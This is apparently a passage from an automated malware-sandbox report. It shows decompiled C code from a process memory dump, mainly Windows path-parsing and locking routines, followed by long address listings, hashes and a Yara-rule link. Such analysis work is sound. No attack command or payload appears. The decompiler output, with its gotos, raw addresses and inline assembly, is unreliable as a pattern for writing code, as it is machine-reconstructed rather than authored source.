										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M1E3C45F8))) {
												case 0:
													_v568 = 0x1e381078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x1e3811c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L1E3C4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E1E3EF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E1E3EF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E1E3A52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E1E3BEB70(1, 0x1e4979a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E1E3BAA20( &_v556, _t182 + 0xc,  &_v556, "true");
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E1E3E95D0();
																			L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E1E3EB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E1E3E3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E1E3EB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                        0x1e3c4128
                                        0x1e3c4135
                                        0x1e3c413c
                                        0x1e3c4141
                                        0x1e3c4145
                                        0x1e3c4147
                                        0x1e3c414e
                                        0x1e3c4151
                                        0x1e3c4159
                                        0x1e3c415c
                                        0x1e3c4160
                                        0x1e3c4164
                                        0x1e3c4168
                                        0x1e3c416c
                                        0x1e3c417f
                                        0x1e3c4181
                                        0x1e3c446a
                                        0x1e3c446a
                                        0x1e3c418c
                                        0x1e3c4195
                                        0x1e3c4199
                                        0x1e3c4432
                                        0x1e3c4439
                                        0x1e3c443d
                                        0x1e3c4442
                                        0x1e3c4447
                                        0x00000000
                                        0x1e3c419f
                                        0x1e3c41a3
                                        0x1e3c41b1
                                        0x1e3c41b9
                                        0x1e3c41bd
                                        0x1e3c45db
                                        0x1e3c45db
                                        0x00000000
                                        0x1e3c41c3
                                        0x1e3c41c3
                                        0x1e3c41ce
                                        0x1e3c41d4
                                        0x1e40e138
                                        0x1e40e13e
                                        0x1e40e169
                                        0x1e40e16d
                                        0x1e40e19e
                                        0x1e40e16f
                                        0x1e40e16f
                                        0x1e40e175
                                        0x1e40e179
                                        0x1e40e18f
                                        0x1e40e193
                                        0x00000000
                                        0x1e40e199
                                        0x00000000
                                        0x1e40e199
                                        0x1e40e193
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3c41da
                                        0x1e3c41da
                                        0x1e3c41df
                                        0x1e3c41e4
                                        0x1e3c41ec
                                        0x1e3c4203
                                        0x1e3c4207
                                        0x1e40e1fd
                                        0x1e3c4222
                                        0x1e3c4226
                                        0x1e40e1f3
                                        0x1e40e1f3
                                        0x1e3c422c
                                        0x1e3c422c
                                        0x1e3c4233
                                        0x1e40e1ed
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3c4239
                                        0x1e3c4239
                                        0x1e3c4239
                                        0x1e3c4239
                                        0x1e3c4233
                                        0x1e3c4226
                                        0x1e3c41ee
                                        0x1e3c41ee
                                        0x1e3c41f4
                                        0x1e3c4575
                                        0x1e40e1b1
                                        0x1e40e1b1
                                        0x00000000
                                        0x1e3c457b
                                        0x1e3c457b
                                        0x1e3c4582
                                        0x1e40e1ab
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3c4588
                                        0x1e3c4588
                                        0x1e3c458c
                                        0x1e40e1c4
                                        0x1e40e1c4
                                        0x00000000
                                        0x1e3c4592
                                        0x1e3c4592
                                        0x1e3c4599
                                        0x1e40e1be
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3c459f
                                        0x1e3c459f
                                        0x1e3c45a3
                                        0x1e40e1d7
                                        0x1e40e1e4
                                        0x00000000
                                        0x1e3c45a9
                                        0x1e3c45a9
                                        0x1e3c45b0
                                        0x1e40e1d1
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3c45b6
                                        0x1e3c45b6
                                        0x1e3c45b6
                                        0x00000000
                                        0x1e3c45b6
                                        0x1e3c45b0
                                        0x1e3c45a3
                                        0x1e3c4599
                                        0x1e3c458c
                                        0x1e3c4582
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3c41f4
                                        0x1e3c423e
                                        0x1e3c4241
                                        0x1e3c45c0
                                        0x1e3c45c4
                                        0x00000000
                                        0x1e3c45ca
                                        0x1e3c45ca
                                        0x00000000
                                        0x1e40e207
                                        0x1e40e20f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3c45d1
                                        0x00000000
                                        0x00000000
                                        0x1e3c45ca
                                        0x00000000
                                        0x1e3c4247
                                        0x1e3c4247
                                        0x1e3c4247
                                        0x1e3c4249
                                        0x1e3c4249
                                        0x1e3c4249
                                        0x1e3c4251
                                        0x1e3c4251
                                        0x1e3c4257
                                        0x1e3c425f
                                        0x1e3c426e
                                        0x1e3c4270
                                        0x1e3c427a
                                        0x1e40e219
                                        0x1e40e219
                                        0x1e3c4280
                                        0x1e3c4282
                                        0x1e3c4456
                                        0x1e3c45ea
                                        0x00000000
                                        0x1e3c45f0
                                        0x1e40e223
                                        0x00000000
                                        0x1e40e223
                                        0x1e3c445c
                                        0x1e3c445c
                                        0x00000000
                                        0x1e3c445c
                                        0x00000000
                                        0x1e3c4288
                                        0x1e3c428c
                                        0x1e40e298
                                        0x1e3c4292
                                        0x1e3c4292
                                        0x1e3c429e
                                        0x1e3c42a3
                                        0x1e3c42a7
                                        0x1e3c42ac
                                        0x1e40e22d
                                        0x1e3c42b2
                                        0x1e3c42b2
                                        0x1e3c42b9
                                        0x1e3c42bc
                                        0x1e3c42c2
                                        0x1e3c42ca
                                        0x1e3c42cd
                                        0x1e3c42cd
                                        0x1e3c42d4
                                        0x1e3c433f
                                        0x1e3c433f
                                        0x1e3c42d6
                                        0x1e3c42d6
                                        0x1e3c42d9
                                        0x1e3c42dd
                                        0x1e3c42eb
                                        0x1e40e23a
                                        0x1e3c42f1
                                        0x1e3c4305
                                        0x1e3c430d
                                        0x1e3c4315
                                        0x1e3c4318
                                        0x1e3c431f
                                        0x1e3c4322
                                        0x1e3c432e
                                        0x1e3c433b
                                        0x1e3c433b
                                        0x00000000
                                        0x1e3c432e
                                        0x1e3c42eb
                                        0x1e3c434c
                                        0x1e3c434e
                                        0x1e3c4352
                                        0x1e3c4359
                                        0x1e3c435e
                                        0x1e3c4361
                                        0x1e3c436e
                                        0x1e3c438a
                                        0x1e3c438e
                                        0x1e3c4396
                                        0x1e3c439e
                                        0x1e3c43a1
                                        0x1e3c43ad
                                        0x1e3c43bb
                                        0x1e3c43bb
                                        0x1e3c43ad
                                        0x1e3c436e
                                        0x1e3c43bf
                                        0x1e3c43c5
                                        0x1e3c4463
                                        0x1e3c4463
                                        0x1e3c43ce
                                        0x1e3c43d5
                                        0x1e3c43d9
                                        0x1e3c43df
                                        0x1e3c4475
                                        0x1e3c4479
                                        0x1e3c4491
                                        0x1e3c4491
                                        0x1e3c4479
                                        0x1e3c43e5
                                        0x1e3c43eb
                                        0x1e3c43f4
                                        0x1e3c43f6
                                        0x1e3c43f9
                                        0x1e3c43fc
                                        0x1e3c43ff
                                        0x1e3c44e8
                                        0x1e3c44ed
                                        0x1e3c44f3
                                        0x1e40e247
                                        0x00000000
                                        0x1e3c44f9
                                        0x1e3c4504
                                        0x1e3c4508
                                        0x1e3c450f
                                        0x1e40e269
                                        0x00000000
                                        0x1e3c4515
                                        0x1e3c4519
                                        0x1e3c4531
                                        0x1e3c4534
                                        0x1e3c4537
                                        0x1e3c453e
                                        0x1e3c4541
                                        0x1e3c454a
                                        0x1e40e255
                                        0x1e40e255
                                        0x1e40e25b
                                        0x1e40e25e
                                        0x1e40e261
                                        0x1e40e261
                                        0x1e3c4555
                                        0x1e3c4559
                                        0x1e3c455d
                                        0x1e40e26d
                                        0x1e40e270
                                        0x1e40e274
                                        0x1e40e27a
                                        0x1e40e27d
                                        0x1e40e28e
                                        0x1e40e28e
                                        0x1e3c4563
                                        0x1e3c4563
                                        0x1e3c4569
                                        0x1e3c4569
                                        0x00000000
                                        0x1e3c455d
                                        0x1e3c450f
                                        0x00000000
                                        0x1e3c44f3
                                        0x1e3c43ff
                                        0x1e3c4405
                                        0x1e3c4405
                                        0x1e3c4405
                                        0x1e3c42ac
                                        0x1e3c428c
                                        0x1e3c4282
                                        0x1e3c4407
                                        0x1e3c440d
                                        0x1e40e2af
                                        0x1e40e2af
                                        0x1e3c4413
                                        0x1e3c4413
                                        0x00000000
                                        0x1e3c41d4
                                        0x00000000
                                        0x1e3c41c3
                                        0x1e3c41bd
                                        0x1e3c4415
                                        0x1e3c4415
                                        0x1e3c4416
                                        0x1e3c4417
                                        0x1e3c4429
                                        0x1e3c416e
                                        0x1e3c416e
                                        0x1e3c4175
                                        0x1e3c4498
                                        0x1e3c449f
                                        0x1e40e12d
                                        0x00000000
                                        0x1e40e133
                                        0x00000000
                                        0x1e40e133
                                        0x1e3c44a5
                                        0x1e3c44a5
                                        0x1e3c44aa
                                        0x00000000
                                        0x1e3c44bb
                                        0x1e3c44ca
                                        0x1e3c44d6
                                        0x1e3c44d7
                                        0x1e3c44d8
                                        0x1e3c44e3
                                        0x1e3c44e3
                                        0x1e3c44aa
                                        0x1e3c417b
                                        0x1e3c417b
                                        0x1e3c417b
                                        0x00000000
                                        0x1e3c417b
                                        0x1e3c4175
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 20e427a648e830774bb15882ebeaab288558bd5b3981c85618b975f2929638b3
                                        • Instruction ID: 66d964714607f9c7f8e0cb53d725439a794c054f7944c0576d445e2491f4ab72
                                        • Opcode Fuzzy Hash: 20e427a648e830774bb15882ebeaab288558bd5b3981c85618b975f2929638b3
                                        • Instruction Fuzzy Hash: 62F15A74A182518BC714CF59C490A6AB7E6FF88714F154A2FF88ACB290E734ED91CB52
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3D20A0, Relevance: .4, Instructions: 420COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 92%
                                        			E1E3D20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1e498714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E1E3D2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E1E3D2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E1E3A58EC(_t240);
									_t221 =  *0x1e495cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1e495cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E1E3E4A2C(0x1e496e40, 0x1e3e4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E1E3C7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1e385c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E1E3DF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E1E3DF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E1E427016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L1E3C2400(_t267 + 0x20);
															}
															L1E3C2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E1E3D2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E1E3C2280(_t134, 0x1e498608);
									__eflags =  *0x1e496e48 - _t253; // 0x941220
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E1E3BFFB0(_t198, _t241, 0x1e498608);
										__eflags = _t253;
										if(_t253 != 0) {
											L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1e496e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1e498608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t210 = _t231 + 1;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E1E3D6B90(_t210,  &_v64);
										_t262 =  *0x1e498608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E1E3DE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E1E3E97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E1E3E006A(0x1e498608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1e498608);
												E1E3EB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1e496904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1e496e48; // 0x941220
							_v72 = _t229;
							if(_t229 == 0) {
								L45:
								E1E3BFFB0(_t198, _t240, 0x1e498608);
								_t253 = _v76;
								goto L29;
							}
							if( *((char*)(_t229 + 0x40)) != 0) {
								L13:
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E1E3E00C2(0x1e498608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
							_t18 = _t229 + 0x38; // 0x8
							if( *_t18 !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								goto L45;
							}
							goto L13;
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                        0x1e3d20a0
                                        0x1e3d20a8
                                        0x1e3d20ad
                                        0x1e3d20b3
                                        0x1e3d20b8
                                        0x1e3d20c2
                                        0x1e3d20c7
                                        0x1e3d20cb
                                        0x1e3d20d2
                                        0x1e3d2263
                                        0x1e3d2266
                                        0x1e415836
                                        0x1e415836
                                        0x00000000
                                        0x1e3d226c
                                        0x1e3d226c
                                        0x1e3d2270
                                        0x1e3d2274
